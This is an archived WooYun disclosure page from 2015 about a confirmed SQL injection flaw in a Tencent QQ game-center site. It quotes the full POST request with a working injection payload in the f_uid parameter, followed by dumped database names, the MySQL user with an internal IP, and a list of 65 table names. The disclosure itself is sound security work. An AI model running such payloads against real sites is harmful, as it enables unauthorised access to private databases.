当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0121923

漏洞标题:QQ某站点MySQL注射(支持union)

相关厂商:腾讯

漏洞作者: lijiejie

提交时间:2015-06-21 14:27

修复时间:2015-08-07 10:56

公开时间:2015-08-07 10:56

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-06-21: 细节已通知厂商并且等待厂商处理中
2015-06-23: 厂商已经确认,细节仅向厂商公开
2015-07-03: 细节向核心白帽子及相关领域专家公开
2015-07-13: 细节向普通白帽子公开
2015-07-23: 细节向实习白帽子公开
2015-08-07: 细节向公众公开

简要描述:

QQ某站点MySQL注射(支持union)

详细说明:

注入点:

POST /json.php?act=addChannel&dir=&mod=ComponentInfo HTTP/1.1
Content-Length: 75
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://s.qq.com
Host: s.qq.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_0 like Mac OS X) AppleWebKit/600.1.3 (KHTML, like Gecko) Version/8.0 Mobile/12A4345d Safari/600.1.4
Accept: */*
f_channel_name=test&f_uid=-1' OR ascii(mid(user()from(1)for(1)))!=123 AND 1=1 --


参数f_uid可注入。MySQL union注入。

漏洞证明:

available databases [6]:
[*] db_game_center
[*] db_game_center_pre
[*] db_gamecenter_app
[*] information_schema
[*] mysql
[*] test


[Done] MySQL user is gamecenter@10.194.147.122
Current db is db_gamecenter_app


Database: db_gamecenter_app
[65 tables]
+----------------------------------------------+
| t_activity_book_cdkey |
| t_activity_book_info |
| t_activity_download_info |
| t_ad_info |
| t_ad_info_20150613 |
| t_ad_location_info |
| t_app_update_check_info |
| t_business_config |
| t_business_field_config |
| t_channel_game_info |
| t_game_base_lists |
| t_game_black_list |
| t_game_broadcast_auto_info |
| t_game_broadcast_manual_info |
| t_game_category_info |
| t_game_channel |
| t_game_giftparam |
| t_game_history_popular_list |
| t_game_history_ranking_list |
| t_game_id_map |
| t_game_info |
| t_game_info_check40 |
| t_game_info_tmp |
| t_game_label |
| t_game_label_info |
| t_game_must_play_category_game_info |
| t_game_must_play_category_info |
| t_game_order_info |
| t_game_popular_list |
| t_game_ranking_list |
| t_game_rating |
| t_gameorder_hiddenrule |
| t_gift |
| t_gift_record |
| t_id_config |
| t_id_config_20150603 |
| t_ios_game_info |
| t_ios_game_list |
| t_main_record |
| t_mga_auto_id |
| t_mga_channel |
| t_mga_channel_game |
| t_mga_game |
| t_mga_original_game_list |
| t_mga_user |
| t_mga_user_white_list |
| t_operation_log |
| t_package_name |
| t_player_recommand_info |
| t_recommend_category |
| t_recommend_hotword |
| t_search_category_map |
| t_search_log_hotword |
| t_subject_game_info |
| t_subject_info |
| t_sys_msg |
| t_yyb_game_category_list |
| t_yyb_game_category_list_cms |
| t_yyb_game_category_list_cms_all_check_level |
| t_yyb_game_category_specify_position |
| t_yyb_game_category_type |
| t_yyb_game_history_category_list |
| t_yyb_game_specify_position |
| tbArticle4Hall |
| tbGameApk |
+----------------------------------------------+

修复方案:

参数过滤

版权声明:转载请注明来源 lijiejie@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-06-23 10:54

厂商回复:

非常感谢您的报告,问题已着手处理,感谢大家对腾讯业务安全的关注。如果您有任何疑问,欢迎反馈,我们会有专人跟进处理。

最新状态:

暂无